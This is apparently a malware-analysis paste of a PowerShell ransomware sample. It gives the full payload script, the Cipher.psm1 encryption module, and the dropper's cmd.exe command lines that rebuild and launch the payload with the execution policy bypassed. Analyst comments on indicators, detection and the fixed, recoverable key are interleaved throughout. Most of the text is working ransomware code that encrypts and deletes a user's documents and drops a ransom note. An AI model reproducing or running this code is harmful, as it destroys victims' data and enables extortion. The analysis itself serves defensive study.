James_inthe_box

Powershell Ransomware

Jan 3rd, 2019
  1. cry.ps1 (the PowerShell payload; written to %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher and launched by the two cmd.exe command lines at the end of this listing):
  # cry.ps1 — the payload, shown here collapsed onto one line (the dropper below writes it as four
  # lines, and the second command appends a fifth). In order:
  #   1. Import-Module Cipher — loads Cipher.psm1 (below) by name from the per-user module path
  #      %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher, where the dropper places it.
  #   2. Recursively lists $home for the given extensions (images, Office documents, PDF, text,
  #      audio/video) and drops directories.
  #   3. Protect-File on each hit: AES, key supplied with -KeyAsPlainText as base64 — it decodes to
  #      the 32 ASCII bytes "f799040469c528260a11cdb745ebe305", which Protect-File turns into a
  #      256-bit key; output is the source path plus '.locked'; -RemoveSource then deletes the
  #      original with an ordinary Remove-Item (no overwrite).
  #   4. Writes the ransom note to $home\Desktop\Readme_now.txt and opens it (`start` is the
  #      Start-Process alias).
  #   5. Deletes everything in the module directory — Cipher.psm1 and cry.ps1 itself — as cleanup.
  # Analyst notes:
  #   - The key is a fixed literal, the same for every victim; the "Your ID" value in the note is
  #     likewise a literal in the script, not something derived per machine. Whoever has this script
  #     (or a copy of cry.ps1 taken before step 5) has the key, and Protect-File stores the per-file
  #     IV in clear at the start of each .locked file, so the files can be decrypted without the
  #     attacker's help.
  #   - Scope is the profile of the account that ran it; nothing here escalates privilege, spreads,
  #     or contacts a network.
  #   - Host IOCs: the '.locked' suffix, Desktop\Readme_now.txt, the Modules\Cipher directory, the
  #     contact address (redacted in this copy) and the ID string d7b9-068a-8e17.
  2. Import-Module Cipher $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.mp3, *.mp4, *.avi | where {! $_.PSIsContainer} foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText Zjc5OTA0MDQ2OWM1MjgyNjBhMTFjZGI3NDVlYmUzMDU= -Suffix '.locked' -RemoveSource } echo 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: d7b9-068a-8e17' > $home\Desktop\Readme_now.txt start $home\Desktop\Readme_now.txt Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\*
  3.  
  4. Cipher.psm1 (the module cry.ps1 imports — a general-purpose file-encryption helper providing New-CryptographyKey and Protect-File; the ransomware only calls Protect-File):
  # New-CryptographyKey: generate a fresh symmetric key through the .NET SymmetricAlgorithm factory
  # and return it base64-encoded.
  #   -Algorithm    AES/DES/RC2/Rijndael/TripleDES (default AES). DES, RC2 and TripleDES are
  #                 accepted although they are obsolete ciphers.
  #   -KeySize      key length in bits; applied only when explicitly passed, otherwise the
  #                 algorithm object's .NET default is used (256 for AES).
  #   -AsPlainText  return a [String] instead of a [SecureString] ('PlainText' parameter set).
  # Returns: base64 of $Crypto.Key, plain or wrapped in a SecureString.
  # Security note: on the SecureString path the base64 key has already existed as an immutable
  # managed string (the ToBase64String result is piped into ConvertTo-SecureString), so the
  # wrapper adds little against memory inspection.
  # Relevance to the sample: cry.ps1 calls Protect-File with -KeyAsPlainText, and Protect-File's
  # Begin block then overwrites $Key from that string, so whatever this function would have
  # produced as the default key is discarded — the ransomware's key is the hard-coded literal.
  5. function New-CryptographyKey() {
  6. [CmdletBinding()]
  7. [OutputType([System.Security.SecureString])]
  8. [OutputType([String], ParameterSetName='PlainText')]
  9. Param([Parameter(Mandatory=$false, Position=1)]
  10. [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')]
  11. [String]$Algorithm='AES',
  12. [Parameter(Mandatory=$false, Position=2)]
  13. [Int]$KeySize,
  14. [Parameter(ParameterSetName='PlainText')]
  15. [Switch]$AsPlainText)
  16. Process {
  17. try {
  # Factory lookup by algorithm name; the object's defaults (key size, mode, padding) apply unless
  # a caller overrides them.
  18. $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm)
  19. if($PSBoundParameters.ContainsKey('KeySize')){
  20. $Crypto.KeySize = $KeySize }
  # Ask the algorithm object for a new random key of the configured size.
  21. $Crypto.GenerateKey()
  22. if($AsPlainText) {
  23. return [System.Convert]::ToBase64String($Crypto.Key) }
  24. else {
  # The base64 text is a managed string before it is wrapped — see the note above.
  25. return [System.Convert]::ToBase64String($Crypto.Key) | ConvertTo-SecureString -AsPlainText -Force } }
  # Non-terminating: the caller gets $null on failure rather than an exception.
  26. catch { Write-Error $_ } } }
  # Protect-File: encrypt one or more files with a symmetric key, writing <path><Suffix> and
  # optionally deleting the source. This is the routine cry.ps1 drives.
  # Parameters:
  #   -FileName        path(s); pipeline input accepted, PSPath/LiteralPath aliases.
  #   -Algorithm       AES/DES/RC2/Rijndael/TripleDES (default AES).
  #   -Key             SecureString holding the base64 key ('SecureString' set; default is a
  #                    freshly generated key from New-CryptographyKey).
  #   -KeyAsPlainText  base64 key as a plain string ('PlainText' set) — what cry.ps1 passes.
  #   -CipherMode / -PaddingMode  applied only when passed; otherwise the .NET defaults of the
  #                    algorithm object apply (for AES: CBC with PKCS7 padding).
  #   -Suffix          appended to the source's full path for the output (default ".<Algorithm>";
  #                    cry.ps1 passes '.locked').
  #   -RemoveSource    delete the original after a successful encryption.
  # Output file layout: [4-byte IV length, BitConverter host byte order][IV][ciphertext]. No MAC or
  # authentication tag and no key identifier are written, so a file cannot be integrity-checked
  # before decryption. The IV is regenerated per file.
  # Returns: the FileInfo of each output, decorated with SourceFile, Algorithm, Key (the
  # SecureString itself), CipherMode and PaddingMode note properties — the key rides along with
  # every result object emitted to the pipeline.
  # Errors: key setup in Begin fails as a terminating error (-ErrorAction Stop); a per-file failure
  # is written with Write-Error, the partial output is deleted, and the loop moves on.
  # Key hygiene: the BSTR from SecureStringToBSTR is never released (no ZeroFreeBSTR), the decoded
  # $EncryptionKey byte array is never cleared, and there is no End block disposing $Crypto — the
  # raw key stays in the process memory of the PowerShell host, which matters for memory forensics.
  27. Function Protect-File {
  28. [CmdletBinding(DefaultParameterSetName='SecureString')]
  29. [OutputType([System.IO.FileInfo[]])]
  30. Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
  31. [Alias('PSPath','LiteralPath')]
  32. [string[]]$FileName,
  33. [Parameter(Mandatory=$false, Position=2)]
  34. [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')]
  35. [String]$Algorithm = 'AES',
  36. [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')]
  37. [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm),
  38. [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')]
  39. [String]$KeyAsPlainText,
  40. [Parameter(Mandatory=$false, Position=4)]
  41. [System.Security.Cryptography.CipherMode]$CipherMode,
  42. [Parameter(Mandatory=$false, Position=5)]
  43. [System.Security.Cryptography.PaddingMode]$PaddingMode,
  44. [Parameter(Mandatory=$false, Position=6)]
  45. [String]$Suffix = ".$Algorithm",
  46. [Parameter()]
  47. [Switch]$RemoveSource)
  48. Begin { try {
  # 'PlainText' set: wrap the given string so both sets continue with a SecureString in $Key.
  49. if($PSCmdlet.ParameterSetName -eq 'PlainText') {
  50. $Key = $KeyAsPlainText | ConvertTo-SecureString -AsPlainText -Force}
  # Unwrap to raw key bytes. The BSTR is not zeroed/freed afterwards (see header).
  51. $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key)
  52. $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR))
  53. $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm)
  54. if($PSBoundParameters.ContainsKey('CipherMode')){
  55. $Crypto.Mode = $CipherMode }
  56. if($PSBoundParameters.ContainsKey('PaddingMode')){
  57. $Crypto.Padding = $PaddingMode }
  # Key size is inferred from the decoded length (32 bytes -> AES-256 for the sample's key); a
  # length the algorithm does not support throws here and becomes the terminating error below.
  58. $Crypto.KeySize = $EncryptionKey.Length*8
  59. $Crypto.Key = $EncryptionKey }
  60. Catch { Write-Error $_ -ErrorAction Stop } }
  61. Process {
  # -LiteralPath here, but plain Get-Item (wildcard-interpreting) on the result further down.
  62. $Files = Get-Item -LiteralPath $FileName
  63. ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix
  64. Try {
  # FileMode.Open with the FileStream constructor defaults; a source another process holds
  # locked presumably fails here and lands in the Catch, leaving that file untouched.
  65. $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open)
  66. $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create)
  # Fresh IV per file, stored in clear ahead of the ciphertext: 4-byte length, then the IV bytes.
  67. $Crypto.GenerateIV()
  68. $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4)
  69. $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length)
  70. $Transform = $Crypto.CreateEncryptor()
  71. $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
  # Whole-file copy through the encryptor; FlushFinalBlock emits the padded last block.
  72. $FileStreamReader.CopyTo($CryptoStream)
  73. $CryptoStream.FlushFinalBlock()
  74. $CryptoStream.Close()
  75. $FileStreamReader.Close()
  76. $FileStreamWriter.Close()
  # Source is removed only after the streams closed cleanly, i.e. after the encrypted copy is
  # complete. It is an ordinary delete — the original's data is not overwritten.
  77. if($RemoveSource){Remove-Item -LiteralPath $File.FullName}
  # Not -LiteralPath: an output path containing wildcard characters such as [ ] would be
  # mis-resolved here even though the file was written correctly.
  78. $result = Get-Item $DestinationFile
  79. $result | Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName
  80. $result | Add-Member -MemberType NoteProperty -Name Algorithm -Value $Algorithm
  # The key itself is attached to the returned object.
  81. $result | Add-Member -MemberType NoteProperty -Name Key -Value $Key
  82. $result | Add-Member -MemberType NoteProperty -Name CipherMode -Value $Crypto.Mode
  83. $result | Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding
  84. $result }
  # Per-file failure: report it, discard the partial <Suffix> output, continue with the next file.
  85. Catch { Write-Error $_
  86. If($FileStreamWriter)
  87. { $FileStreamWriter.Close()
  88. Remove-Item -LiteralPath $DestinationFile -Force }
  89. Continue
  # Close whatever was opened on this iteration; the variables persist across iterations, so on an
  # early failure these may refer to the previous file's already-closed streams (harmless).
  90. } Finally { if($CryptoStream){$CryptoStream.Close()}
  91. if($FileStreamReader){$FileStreamReader.Close()}
  92. if($FileStreamWriter){$FileStreamWriter.Close()} } } } }
  93.  
  94. Embedded in the dropper exe — the two cmd.exe command lines that write the files above and launch cry.ps1 (hard-wrapped at a fixed width in this listing, so some tokens are split across lines):
  REM Stage 1: one long "cmd.exe /c" command line from the dropper (wrapped at a fixed width in
  REM this listing, so tokens such as "ech"/"o" are split across lines — it ran as a single line).
  REM What it does: creates %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher (a per-user
  REM module location, so "Import-Module Cipher" later resolves by name), cd's into it, and
  REM rebuilds Cipher.psm1 one line at a time with "echo ... > Cipher.psm1" for the first line and
  REM "echo ... >> Cipher.psm1" for the rest. The trailing echo lines write cry.ps1 into the same
  REM directory, then "exit". The "^" characters escape cmd metacharacters (^| ^! ^>) so that the
  REM pipe, negation and redirect land in the .psm1/.ps1 files literally.
  REM No PowerShell runs in this stage, so PowerShell script-block logging sees nothing until
  REM stage 2; the file content itself, however, is fully present in this one command line.
  REM Detection: a single process-creation event (4688 / Sysmon event 1) for cmd.exe whose command
  REM line is thousands of characters long and contains dozens of ">> Cipher.psm1" fragments.
  95. cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & ech
  96. o [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','
  97. RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName=
  98. 'PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create
  99. ($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 &
  100. echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System
  101. .Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cip
  102. her.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPr
  103. opertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES'
  104. ,'RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$K
  105. ey = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=
  106. $false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$Paddin
  107. gMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo
  108. Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo
  109. $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Ciphe
  110. r.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $
  111. CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8
  112. >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -Literal
  113. Path $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System
  114. .IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.Ge
  115. nerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length) >> Cipher.psm1 &
  116. echo $Transform = $Crypto.CreateEncryptor() >> Cipher.psm1 & echo $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]
  117. ::Write) >> Cipher.psm1 & echo $FileStreamReader.CopyTo($CryptoStream) >> Cipher.psm1 & echo $CryptoStream.FlushFinalBlock() >> Cipher.psm1 & echo $CryptoStream.Close() >> Cipher.psm1 & echo
  118. $FileStreamReader.Close() >> Cipher.psm1 & echo $FileStreamWriter.Close() >> Cipher.psm1 & echo if($RemoveSource){Remove-Item -LiteralPath $File.FullName} >> Cipher.psm1 & echo $result =
  119. Get-Item $DestinationFile >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Algo
  120. rithm -Value $Algorithm >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Key -Value $Key >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name CipherMode -Value $Cryp
  121. to.Mode >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding >> Cipher.psm1 & echo $result } >> Cipher.psm1 & echo Catch { Write-E
  122. rror $_ >> Cipher.psm1 & echo If($FileStreamWriter) >> Cipher.psm1 & echo { $FileStreamWriter.Close() >> Cipher.psm1 & echo Remove-Item -LiteralPath $DestinationFile -Force } >> Cipher.psm1 &
  123. echo Continue >> Cipher.psm1 & echo } Finally { if($CryptoStream){$CryptoStream.Close()} >> Cipher.psm1 & echo if($FileStreamReader){$FileStreamReader.Close()} >> Cipher.psm1 & echo
  124. if($FileStreamWriter){$FileStreamWriter.Close()} } } } } >> Cipher.psm1 & echo Import-Module Cipher > cry.ps1 & echo $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.m
  125. p3, *.mp4, *.avi ^| where {^! $_.PSIsContainer} >> cry.ps1 & echo foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText Zjc5OTA0MDQ2OWM1MjgyNjBhMTFjZGI3NDVlYmUzMDU= -Suffix '.locked' -RemoveSource } >> cry.ps1 & echo ech
  126. o 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: d7b9-068a-8e17' ^> $home\Desktop\Readme_now.txt >> cry.ps1 & echo start $home\Desktop\Readme_now.txt >> cry.ps1 & exit
  127.  
  REM Stage 2: cd into the module directory, append the self-cleanup line
  REM ("Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\*") to cry.ps1, then run
  REM it with "powershell -ExecutionPolicy ByPass -File ...\Cipher\cry.ps1" and exit. ByPass is a
  REM per-process setting; the machine's execution policy is not changed.
  REM The appended Remove-Item deletes Cipher.psm1 and cry.ps1 itself; since -File presumably reads
  REM the whole script before running it, this works, and afterwards the on-disk artefacts are the
  REM .locked files, the Desktop note, and the (now empty) Modules\Cipher directory.
  REM Detection: powershell.exe as a child of cmd.exe with "-ExecutionPolicy ByPass -File" pointing
  REM under Documents\WindowsPowerShell\Modules; PowerShell script-block logging (event 4104), where
  REM enabled, would record cry.ps1 in full, including the hard-coded base64 key.
  128. cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -Execut
  129. ionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit